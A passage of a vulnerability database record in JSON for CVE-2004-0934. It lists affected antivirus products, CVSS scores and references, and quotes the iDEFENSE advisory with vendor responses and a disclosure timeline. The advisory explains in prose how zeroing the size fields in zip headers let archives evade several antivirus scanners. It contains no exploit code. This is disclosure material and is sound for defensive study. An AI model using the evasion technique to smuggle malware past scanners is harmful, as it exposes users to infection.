"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:archive_zip:archive_zip:1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.78d:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.85:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.86:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_antivirus:7.0_sp2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_secure_content_manager:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:inoculateit:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_desktop:8.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_file_servers:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.81:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.82:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:kaspersky_lab:kaspersky_anti-virus:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:mcafee:antivirus_engine:4.3.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.79:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.80:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_puremessage_anti-virus:4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_small_business_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:1.4.1.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.12:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:eset_software:nod32_antivirus:1.0.13:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.4.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sophos:sophos_anti-virus:3.84:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:gentoo:linux:1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0934"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0934",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9364",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0934",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#968818",
"trust": 0.8,
"value": "7.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-310",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9364",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9364"
},
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Anti-virus software may rely on corrupted headers to determine if a zip archive is valid. As a result, anti-virus software may fail to detect malicious content within a zip archive. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. Kaspersky is a well-known antivirus software. Kaspersky 3.x and 4.x versions have issues when processing .zip files, resulting in a vulnerability to bypass antivirus checks. \n\nII. DESCRIPTION\n\nRemote exploitation of an exceptional condition error in multiple\nvendors\u0027 anti-virus software allows attackers to bypass security\nprotections by evading virus detection. \nThe .zip file format stores information about compressed files in two\nlocations - a local header and a global header. The local header exists\njust before the compressed data of each file, and the global header\nexists at the end of the .zip archive. It is possible to modify the\nuncompressed size of archived files in both the local and global header\nwithout affecting functionality. This has been confirmed with both\nWinZip and Microsoft Compressed Folders. An attacker can compress a\nmalicious payload and evade detection by some anti-virus software by\nmodifying the uncompressed size within the local and global headers to\nzero. \n\nIII. ANALYSIS\n\nSuccessful exploitation allows remote attackers to pass malicious\npayloads within a compressed archive to a target without being detected. \nMost anti-virus engines have the ability to scan content packaged with\ncompressed archives. As such, users with up-to-date anti-virus software\nare more likely to open attachments and files if they are under the\nfalse impression that the archive was already scanned and found to not\ncontain a virus. \n\nIV. The Vendor Responses section of this\nadvisory contains details on the status of specific vendor fixes for\nthis issue. \n\nV. WORKAROUND\n\nFilter all compressed file archives (.zip) at border gateways,\nregardless of content. \n\nVI. VENDOR RESPONSES\n\nMcAfee\n\"The McAfee scan engine has always been a market leader in detection of\nviruses, worms and Trojans within compressed and archived file formats. \nAs such the mechanism used for the detection of such payloads has been\ndesigned to ensure all archive files are thoroughly scanned at each\nnested level in the file to ensure that all appropriate parts of the\nfile are scanned. \n\nMcAfee is aware of a proof of concept exploitation in Zip archive\npayloads where information in the local header part of the archive is\nmodified. \n\nThe local header exists just before the compressed data of each file. It\nis possible to modify the uncompressed size of archived files in the\nlocal header without affecting functionality. Consequently there is the\npotential for a malicious payload to be hidden and avoid anti-virus\ndetection by modifying the uncompressed size within the local headers to\nzero. \n\nThe techniques used by McAfee to analyze Zip archives have allowed a\ncomprehensive solution for the Zip file format vulnerability to be\nprovided to protect customers. \n\nThe latest update for the current 4320 McAfee Anti-Virus Engine DATS\ndrivers (Version 4398 released on Oct 13th 2004) further enhances the\nprotection afforded to McAfee customers against such potential exploits. \n\nA DATS Driver update issued in Version 4397 (October 6th 2004) provided\nearly protection for the same potential exploit targeted specifically\nfor Gateway and Command line scanning. \n\nIf a detection of this type of exploit is found it will trigger the\nmessage \"Found the Exploit-Zip Trojan!\" to be displayed. \n\nUpdates for the DAT files mentioned above can be located at the\nfollowing links:\n\nHome (Retail) Users:\nhttp://download.mcafee.com/uk/updates/updates.asp\n\nBusiness (Enterprise) Users:\nhttp://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1\n\nIt should be noted that whilst McAfee take the potential for this\nexploit to be used maliciously seriously, to date no evidence of such an\nexploit has been discovered. McAfee has provided additional protection\nthrough the DATS driver update however with usage of the comprehensive\nsuite of anti-virus protection strategies provided by McAfee products,\nMacAfee are confident that this exploit presented no additional threat\nto its customers. \n\nIt should be noted that with McAfee on-access scanning active, such\nmodification for malicious purposes to hide payloads only delays\neventual detection - McAfee on-access detection will detect any payload\nwith malicious intent as malware. \n\nMcAfee continues to focus on ensuring that customers receive maximum\nprotection and provide a rapid response to all potential vulnerabilities\nthus ensuring customer satisfaction.\"\n\nComputer Associates\n\"With the assistance of iDEFENSE, Computer Associates has identified a\nmedium-risk vulnerability in a shared component of eTrust Antivirus\nwhich may allow a specially crafted .ZIP file to bypass virus detection. \nA number of CA products embed this technology including solutions from\neTrust, Brightstor and others. \n\nCustomers are encouraged to visit the CA support web site below for more\ninformation about this vulnerability, a list of products and platforms\nthat are effected, and remediation procedures. \nhttp://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp. \n\nAt Computer Associates, every reported exposure is handled with the\nutmost urgency. We strive to ensure that no customer is left in a\nvulnerable situation.\"\n\nKaspersky\n(09/24/2004)\n\"...this bug for scanners based on 3.x-4.x engines will be fixed in next\n(not current) cumulative update. \n\nFor scanners based on new 5.0 engine we recommend you waiting for the\nrelease of our next maintenance pack. We are going to release it in\nOctober.\"\n\nSophos\n\"A vulnerability has been discovered in Sophos\u0027s handling of Zip archive\nfiles, whereby a Zip file can be deliberately altered to prevent\naccurate scanning by Sophos anti-virus products of its contents. \n\nAlthough theoretically a risk, Sophos has not seen any examples of\nmalware attempting to employ this vulnerability. \n\nFurthermore, The vulnerability does not prevent Sophos\u0027s desktop\non-access scanner from correctly detecting viruses (and preventing\nactual infection) which manage to bypass the email gateway software, so\nthe risks of infection are very small. \n\nSophos has enhanced its scan engine to deal with malformed Zip files. \nVersion 3.87.0 of Sophos Anti-Virus on all operating system platforms\nexcept Windows 95/98/Me includes this fix and customers will be\nautomatically updated to this version via EM Library from Wednesday 20\nOctober 2004. Additionally, a version of the software will be available\nfor download from the Sophos website from Friday 22 October 2004. \n\nSophos Anti-Virus for Windows 95/98/Me customers will be updated with\nthe fix from version 3.88.0 (available from 24 November 2004). \n\nSophos thanks iDEFENSE for their assistance in identifying this\nvulnerability.\"\n\nEset\n\"The vulnerability was caused by the fact that some archive\ncompression/decompression software (including Winzip) incorrectly\nhandles compressed files with deliberately damaged header fields, thus,\nin-fact, allowing creation of the damaged archive files, that could be\nautomatically repaired on the victims computer without notifying the\nuser. \n\nEset has made appropriate modifications to archive-scanning code to\nhandle such kind of archives immediately after receiving notification\nfrom iDEFENSE. These changes are contained in archive-support module\nversion 1.020, released on 16th September 2004 at 21:00 CET. The update\nwas available for all clients with Automatic Virus-Signatures Update\nset.\"\n\nRAV\nNo vendor response\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nfollowing names to these issues:\n\nCAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\nCAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\nCAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\nThese are candidates for inclusion in the CVE list\n(http://cve.mitre.org), which standardizes names for security problems. \n\nVIII. DISCLOSURE TIMELINE\n\n09/16/2004 Initial vendor notification\n09/16/2004 iDEFENSE clients notified\n10/18/2004 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://www.idefense.com/poi/teams/vcp.jsp\n\nX. LEGAL NOTICES\n\nCopyright \u00a9 2004 iDEFENSE, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically, please\nemail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \nThere are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct, indirect,\nor consequential loss or damage arising from use of, or reliance on,\nthis information",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9364"
},
{
"db": "PACKETSTORM",
"id": "34757"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9364",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9364"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2004-0934",
"trust": 2.1
},
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "34757",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9364",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9364"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "PACKETSTORM",
"id": "34757"
},
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"id": "VAR-200501-0310",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9364"
}
],
"trust": 0.725
},
"last_update_date": "2023-12-18T12:40:28.981000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Kaspersky zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146861"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0934"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/968818"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.4,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0934"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/poi/teams/vcp.jsp"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp."
},
{
"trust": 0.1,
"url": "http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org),"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9364"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "PACKETSTORM",
"id": "34757"
},
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#968818"
},
{
"db": "VULHUB",
"id": "VHN-9364"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "PACKETSTORM",
"id": "34757"
},
{
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-310"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-12-10T00:00:00",
"db": "CERT/CC",
"id": "VU#968818"
},
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9364"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2004-10-26T03:28:25",
"db": "PACKETSTORM",
"id": "34757"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0934"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
